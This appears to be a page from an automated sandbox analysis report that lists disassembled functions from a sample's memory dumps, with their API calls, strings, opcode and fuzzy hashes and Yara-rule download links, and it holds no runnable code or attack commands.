Function 014008D1, Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

S,, xrefs: 014009A3

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: S,
API String ID: 0-1214237515
Opcode ID: e5895c671b80af4d14459ad2860ef2f213a2a45f1eb5766283ad539c11f69a72
Instruction ID: dee4288c39cd14bdedccc057cce0dfc00fc2c33c69b5da1fcdb66f97bd51eca9
Opcode Fuzzy Hash: e5895c671b80af4d14459ad2860ef2f213a2a45f1eb5766283ad539c11f69a72
Instruction Fuzzy Hash: ED41F072D00219EBCF08DFA6D94A4EEBFB1FB48318F2480A9D511B6260C7B51A49CF94

Uniqueness

Uniqueness Score: -1.00%

Function 01401193, Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

Zc, xrefs: 014011BD

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: Zc
API String ID: 0-1893601696
Opcode ID: 460722643652c2d26e6f0acc2054c1627bebfdbfebb164a59c5f1e01b163e435
Instruction ID: fba5e7ff12a595587946ecfbe3bff47c01fc62835615dd0e4b94121e95277aed
Opcode Fuzzy Hash: 460722643652c2d26e6f0acc2054c1627bebfdbfebb164a59c5f1e01b163e435
Instruction Fuzzy Hash: 4E3115B15083428FC719CF69994A41FBBE4FB84748F004E1EE596A6260D3B4DA0D8F97

Uniqueness

Uniqueness Score: -1.00%

Function 013F4D8D, Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

^@, xrefs: 013F4DFF

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: ^@
API String ID: 0-322773941
Opcode ID: 262d6f7a42c3e2db43ddbccf0926ae04e26865167014d134ba7cda9bf7d65114
Instruction ID: 8497895801668024074f7db423f580622088fbf83d737c5e404918bb997bf170
Opcode Fuzzy Hash: 262d6f7a42c3e2db43ddbccf0926ae04e26865167014d134ba7cda9bf7d65114
Instruction Fuzzy Hash: BD3104B1D00209BBCF15CFD5C84A8DEBFB5FB99704F108189F914A6150D3B59A65DF90

Uniqueness

Uniqueness Score: -1.00%

Function 013FBEC9, Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

~O_, xrefs: 013FBF6D

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: ~O_
API String ID: 0-756777959
Opcode ID: db3090a45ae7c3739e898a1f80ef998c91600e0c0b12169495f342901a5e0f42
Instruction ID: d7eed25ba9a42e996bcdcad8b6ce84c9b42c8b2918147f20747ddaed137239a2
Opcode Fuzzy Hash: db3090a45ae7c3739e898a1f80ef998c91600e0c0b12169495f342901a5e0f42
Instruction Fuzzy Hash: 60311371E00209EBCB58DFA9C58A5EEFBB5FB44318F208099D115B7260C3B56A54CF90

Uniqueness

Uniqueness Score: -1.00%

Function 013E2309, Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

SV, xrefs: 013E233B

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: SV
API String ID: 0-4155469514
Opcode ID: 4afa1efe4fcc77d53f3341d0477a901efd847119fa855a5a963062e618ca4aff
Instruction ID: 9a1ad78a57d945f46ffe9dbf6c0f192bb4317035b1e2394e567989e6127b55b9
Opcode Fuzzy Hash: 4afa1efe4fcc77d53f3341d0477a901efd847119fa855a5a963062e618ca4aff
Instruction Fuzzy Hash: 9331E1B0D0021AEBCF15DFE9D94A4AEBBB0FF00314F50819ED521A7260D7B59A52CF81

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E1929, Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0116ae304d719bba128c50fce3d87bf66ac0e2bfbb52d636659880bd2d52bfb2
Instruction ID: d691e53cd131b14af228198c9034f7c0b0c8d946409a50f03e1792da295ca1c1
Opcode Fuzzy Hash: 0116ae304d719bba128c50fce3d87bf66ac0e2bfbb52d636659880bd2d52bfb2
Instruction Fuzzy Hash: C0323661D69F424DEB239934D821335A298AFF77C5F15C727E82AB5F9AEF29C0834100

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B2A80, Relevance: .4, Instructions: 425COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _strcspn
String ID:
API String ID: 3709121408-0
Opcode ID: c116ed78f50ecdaad344bd79e7a797e0652ff97d74abcac7667cddc8595cdd22
Instruction ID: 974885997caf02547810db44bc1c07a1c3d5973cdf919eb1aaf340ae441b3379
Opcode Fuzzy Hash: c116ed78f50ecdaad344bd79e7a797e0652ff97d74abcac7667cddc8595cdd22
Instruction Fuzzy Hash: 59E1AF72E10119ABDB05DFA8DC40EEEBBB9FF49700F14452EF815A7240DB34A912CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E4CDC5D, Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e388964a41b4d95bb27caaae4f747b27482261ebc7eaace22aab7dd018fe7e8
Instruction ID: 9fd8d96958cc00e3f5d7a66d3178058ea920a858710a247c99a6988e603fcc32
Opcode Fuzzy Hash: 5e388964a41b4d95bb27caaae4f747b27482261ebc7eaace22aab7dd018fe7e8
Instruction Fuzzy Hash: 8F614B7DAD070566DA505AF888A1FBE73A8DF42F08F00091FD952DB3C0D791D9428E97

Uniqueness

Uniqueness Score: -1.00%

Function 013FD6A7, Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73280ef74348667f9bb46682e7668155456b9c9d6ac80614f548d248d46e72e5
Instruction ID: 1be4c16fb1d9a28f8e6994ae8a498931f1d61bef1e9caa1a0dd32a160dc99099
Opcode Fuzzy Hash: 73280ef74348667f9bb46682e7668155456b9c9d6ac80614f548d248d46e72e5
Instruction Fuzzy Hash: 7B5155725083018FD348CF25D48940BBBE0FBD8768F148A1DF9D9A6260D7B4CA4A8F87

Uniqueness

Uniqueness Score: -1.00%

Function 013EFD91, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66096b10ebe646ef78f9f5ec0eb4e12ed5071ff11f6d2eb90a8d1a0851188ca9
Instruction ID: 5b56722414066d1d5f04037272e93ceea82bf487cf05aca182e8ccfc8e2ef2a2
Opcode Fuzzy Hash: 66096b10ebe646ef78f9f5ec0eb4e12ed5071ff11f6d2eb90a8d1a0851188ca9
Instruction Fuzzy Hash: 4831BF715083418BC304CF29C48941FFFE5EBC8B68F048A9DE4D9A72A1C7B4EA09CB56

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B8A50, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63cd241727f9c0d9023f636bee476899c3ad84106e3150bd46020c8d77d6044a
Instruction ID: 1e0493f24db46d41400a32b79cdab42415d61254cad63c5a9a62b8f69caeab8d
Opcode Fuzzy Hash: 63cd241727f9c0d9023f636bee476899c3ad84106e3150bd46020c8d77d6044a
Instruction Fuzzy Hash: 4421A976A002158FDB50CF68D8C0EA5BBE4FF4E220B1A01EAD949DB712D330E855CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 013E251C, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36e10174b51d4b30331d21f3fbdfa81fefeb3be805abc3d352bc035776b7cbd9
Instruction ID: e6ec03a79b5220ab58ae8bbb78a72eefff75d3b7b73058c522a38a2c35a61657
Opcode Fuzzy Hash: 36e10174b51d4b30331d21f3fbdfa81fefeb3be805abc3d352bc035776b7cbd9
Instruction Fuzzy Hash: BF3154B29083429BD354CF26D50801BFBE4FBC9718F108E5DF5E8A6250D3B8CA498F86

Uniqueness

Uniqueness Score: -1.00%

Function 013F7BB2, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bd7bbd5455baa35b3adc3414b0411bf87c5a60660d83f3599a5aea9db5232a0
Instruction ID: 7b723dda1e73de7594de9e2826d68020783e082c9ff651cea0e1e609af247cee
Opcode Fuzzy Hash: 9bd7bbd5455baa35b3adc3414b0411bf87c5a60660d83f3599a5aea9db5232a0
Instruction Fuzzy Hash: 78213575D01208FFEB48DFE5D84A8AEBBB2EB40340F14C199E525AB280D7B55B15CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B6510, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78b5981a7cfa12a90d6dacec9a1ea9faca388e5f667b79ceaea35c536865e24c
Instruction ID: 1b6c429cfa25789edc93289b66bae411b719e211013ad677dc1a257295707f3a
Opcode Fuzzy Hash: 78b5981a7cfa12a90d6dacec9a1ea9faca388e5f667b79ceaea35c536865e24c
Instruction Fuzzy Hash: 7DE0E6366266618FDF95CB5CF450E5673B0EF40B10B8608E7E815CBB19C370D95185A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B13F0, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2befc1eb188f7f01c2c7bf3db9af76b10d7073361dd05215cd61d8924f7506b
Instruction ID: 513b67be4edd1d986e0762750fbffddf320f0749b097b682cc1280866c81d57a
Opcode Fuzzy Hash: d2befc1eb188f7f01c2c7bf3db9af76b10d7073361dd05215cd61d8924f7506b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 013FDE10, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B9BA0, Relevance: 40.7, APIs: 20, Strings: 3, Instructions: 424memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6E4B9CDA
VariantCopy.OLEAUT32(?,?), ref: 6E4B9CE8
SysFreeString.OLEAUT32(00000000), ref: 6E4B9D30
SysFreeString.OLEAUT32(-00000001), ref: 6E4B9DC2
VariantClear.OLEAUT32(?), ref: 6E4B9DF7
SysFreeString.OLEAUT32(-00000001), ref: 6E4B9E16
SysFreeString.OLEAUT32(00000000), ref: 6E4B9E47
SysFreeString.OLEAUT32(00000000), ref: 6E4B9E60
MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6E4B9EE4
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6E4B9EEE
MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6E4B9F0B
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6E4B9F28
SysFreeString.OLEAUT32(00000000), ref: 6E4B9F37
SysFreeString.OLEAUT32(00000000), ref: 6E4B9FBB
SysFreeString.OLEAUT32(00000000), ref: 6E4B9FFF
_com_issue_error.COMSUPP ref: 6E4BA041
_com_issue_error.COMSUPP ref: 6E4BA04B
_com_issue_error.COMSUPP ref: 6E4BA051
_com_issue_error.COMSUPP ref: 6E4BA05B
SysFreeString.OLEAUT32(76E3D5B0), ref: 6E4BA061

Strings

lines, xrefs: 6E4B9EDB, 6E4B9F02
offsetY, xrefs: 6E4B9CF6
!, xrefs: 6E4BA00A

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$_com_issue_error$Variant$ByteCharMultiWide$AllocBstrClearCopyInit
String ID: !$lines$offsetY
API String ID: 2214081791-1236976741
Opcode ID: df3023d253e4a3b966dad04983234efd3f5d4325f2dcebf5daa2c863de10ed4f
Instruction ID: 2873b28077cfb1b092b321e39c7c1e2aeccff01abe12ff2e3ae2a4000f62c316
Opcode Fuzzy Hash: df3023d253e4a3b966dad04983234efd3f5d4325f2dcebf5daa2c863de10ed4f
Instruction Fuzzy Hash: 01F16B70A0020ADFEB11DFF5C854FAEBBB8AF55714F10445AE915AB380DB76E905CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C23F0, Relevance: 31.7, APIs: 21, Instructions: 183windowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 6E4C24A3
GetParent.USER32(?), ref: 6E4C24AC
GetClientRect.USER32 ref: 6E4C24C2
CreateCompatibleDC.GDI32(?), ref: 6E4C24C8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6E4C24EA
SelectObject.GDI32(00000000,00000000), ref: 6E4C24F6
SelectObject.GDI32(00000000,?), ref: 6E4C2508
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6E4C2521
SendMessageW.USER32(?,0000000F,?,00000000), ref: 6E4C252F
SetBkMode.GDI32(?,00000001), ref: 6E4C2538
SetTextColor.GDI32(?,00FFFFFF), ref: 6E4C2544
GetClientRect.USER32 ref: 6E4C2556
ClientToScreen.USER32(?,?), ref: 6E4C2564
ClientToScreen.USER32(?,?), ref: 6E4C2579
ClientToScreen.USER32(?,?), ref: 6E4C259B
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6E4C25FD
SelectObject.GDI32(?,?), ref: 6E4C2608
SelectObject.GDI32(?,?), ref: 6E4C2613
DeleteObject.GDI32(?), ref: 6E4C261D
DeleteDC.GDI32(?), ref: 6E4C2624
EndPaint.USER32(?,?), ref: 6E4C2632

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSend$BeginBitmapColorModeParentText
String ID:
API String ID: 2796758630-0
Opcode ID: 19d5c7b2cad79eae46085a70d07423ec8655ea38d32e6108b8c45f7b4f35ba22
Instruction ID: a4f4ba4933aaff7c8c9ac57620fbb3a6133bbc8282c155c126e9499dea59fa55
Opcode Fuzzy Hash: 19d5c7b2cad79eae46085a70d07423ec8655ea38d32e6108b8c45f7b4f35ba22
Instruction Fuzzy Hash: 8B614C71104B01AFDB209F74D908F6FBBE9FF89710F00491DF6A5922A1DB70A905CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C2460, Relevance: 31.6, APIs: 21, Instructions: 141windowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 6E4C24A3
GetParent.USER32(?), ref: 6E4C24AC
GetClientRect.USER32 ref: 6E4C24C2
CreateCompatibleDC.GDI32(?), ref: 6E4C24C8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6E4C24EA
SelectObject.GDI32(00000000,00000000), ref: 6E4C24F6
SelectObject.GDI32(00000000,?), ref: 6E4C2508
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6E4C2521
SendMessageW.USER32(?,0000000F,?,00000000), ref: 6E4C252F
SetBkMode.GDI32(?,00000001), ref: 6E4C2538
SetTextColor.GDI32(?,00FFFFFF), ref: 6E4C2544
GetClientRect.USER32 ref: 6E4C2556
ClientToScreen.USER32(?,?), ref: 6E4C2564
ClientToScreen.USER32(?,?), ref: 6E4C2579
ClientToScreen.USER32(?,?), ref: 6E4C259B
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6E4C25FD
SelectObject.GDI32(?,?), ref: 6E4C2608
SelectObject.GDI32(?,?), ref: 6E4C2613
DeleteObject.GDI32(?), ref: 6E4C261D
DeleteDC.GDI32(?), ref: 6E4C2624
EndPaint.USER32(?,?), ref: 6E4C2632

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSend$BeginBitmapColorModeParentText
String ID:
API String ID: 2796758630-0
Opcode ID: fe6f208adfb7dd06c96ad0371a338e9db73fdedc7a3afc39335cea36d10ccf50
Instruction ID: 66a58d4f1b82c98f296b93cd0a0806b13ba465a8f588e5aaaf90e90aa251a8d8
Opcode Fuzzy Hash: fe6f208adfb7dd06c96ad0371a338e9db73fdedc7a3afc39335cea36d10ccf50
Instruction Fuzzy Hash: 39511571408B01AFDB21AF74D908F6EBBE9FF89710F00491DF6A592261DB31A905CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6E4D7B6C, Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E4D7BDC
_free.LIBCMT ref: 6E4D7BF2
_free.LIBCMT ref: 6E4D7C03
_free.LIBCMT ref: 6E4D7C14
_free.LIBCMT ref: 6E4D7C2B
GetCPInfo.KERNEL32(?,?), ref: 6E4D7C73

Part of subcall function 6E4DF178: _free.LIBCMT ref: 6E4DF1E3

_free.LIBCMT ref: 6E4D7E1F
_free.LIBCMT ref: 6E4D7E32
_free.LIBCMT ref: 6E4D7E40
_free.LIBCMT ref: 6E4D7E4B
_free.LIBCMT ref: 6E4D7E8D
_free.LIBCMT ref: 6E4D7E95
_free.LIBCMT ref: 6E4D7E9D
_free.LIBCMT ref: 6E4D7EA5
_free.LIBCMT ref: 6E4D7EB3

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: b4154422d9994ea3449ee46e1636b0f578282ae0db9350cfb75ccbc6daf51756
Instruction ID: 8cabf6a17e491c556fb5e34859347b45f6fc66ed1c5c9536eb925d0611be63ae
Opcode Fuzzy Hash: b4154422d9994ea3449ee46e1636b0f578282ae0db9350cfb75ccbc6daf51756
Instruction Fuzzy Hash: 69B1BE71904206AFEB108FB5C8A4FEEBBB8FF49304F15446EE558A7381D7769849CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E4BA080, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 287memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,49F8414E,76E3D5B0,00000000), ref: 6E4BA124
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6E4BA132
MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,49F8414E,76E3D5B0,00000000), ref: 6E4BA14F
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6E4BA170
SysFreeString.OLEAUT32(00000000), ref: 6E4BA17F
SysFreeString.OLEAUT32(00000000), ref: 6E4BA306
SysFreeString.OLEAUT32(00000000), ref: 6E4BA358
_com_issue_error.COMSUPP ref: 6E4BA366
SysFreeString.OLEAUT32(76E3D5B0), ref: 6E4BA36C

Strings

8, xrefs: 6E4BA22F
line, xrefs: 6E4BA11B, 6E4BA146
Arial, xrefs: 6E4BA195

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstr_com_issue_error
String ID: 8$Arial$line
API String ID: 4202715868-2849647811
Opcode ID: b3df8999f2162305c64d0a450c9dab68cff06a63f4737e4db9f4471520da59b9
Instruction ID: aae3cbdf8e57f464352cb95d15ee0784eb2f65d87898bbde767c9ef71e7e2557
Opcode Fuzzy Hash: b3df8999f2162305c64d0a450c9dab68cff06a63f4737e4db9f4471520da59b9
Instruction Fuzzy Hash: 1CA1B030A00249DFEB10CFF4C858FAEBBB8AF45714F24455EE415AB380DB75AA45DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E2CA4, Relevance: 19.6, APIs: 13, Instructions: 114COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6E4E2CE8

Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E44DB
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E44ED
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E44FF
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E4511
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E4523
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E4535
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E4547
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E4559
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E456B
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E457D
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E458F
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E45A1
Part of subcall function 6E4E44BE: _free.LIBCMT ref: 6E4E45B3

_free.LIBCMT ref: 6E4E2CDD

Part of subcall function 6E4D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BAE
Part of subcall function 6E4D9B98: GetLastError.KERNEL32(6E4D6995,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BC0

_free.LIBCMT ref: 6E4E2CFF
_free.LIBCMT ref: 6E4E2D14
_free.LIBCMT ref: 6E4E2D1F
_free.LIBCMT ref: 6E4E2D41
_free.LIBCMT ref: 6E4E2D54
_free.LIBCMT ref: 6E4E2D62
_free.LIBCMT ref: 6E4E2D6D
_free.LIBCMT ref: 6E4E2DA5
_free.LIBCMT ref: 6E4E2DAC
_free.LIBCMT ref: 6E4E2DC9
_free.LIBCMT ref: 6E4E2DE1

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: fe3c1ae6ca41099156efb5d02b3d2aa38693f4efad087a33e03875414b40c4ab
Instruction ID: 990b88b575f1123c1c256edc1eb1565cfa0ba5da7fca3e5bb7d0c5d28e49d8af
Opcode Fuzzy Hash: fe3c1ae6ca41099156efb5d02b3d2aa38693f4efad087a33e03875414b40c4ab
Instruction Fuzzy Hash: 94318B32614B06AFEB518AB8D820FDA73E8BF01316F21482FE658D7651DF71A8848764

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E45BC, Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E4E4604
_free.LIBCMT ref: 6E4E4628
_free.LIBCMT ref: 6E4E4635
_free.LIBCMT ref: 6E4E465A
_free.LIBCMT ref: 6E4E4667
_free.LIBCMT ref: 6E4E4670
_free.LIBCMT ref: 6E4E494E
_free.LIBCMT ref: 6E4E4956

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c03a0f00fb35889503c7d04549d4c01cc1e7eb5f5bc7f890840ad4568ba1fd4
Instruction ID: 9cec29b4d15ecd5cfb5dc43c5f2316c1e3b9e9d148c823eac49d7c9f6600ce1c
Opcode Fuzzy Hash: 1c03a0f00fb35889503c7d04549d4c01cc1e7eb5f5bc7f890840ad4568ba1fd4
Instruction Fuzzy Hash: 7FC14176D40604AFDB20CAF8CC92FDE77FCAB09755F14455AFA04FB281E670A9458BA0

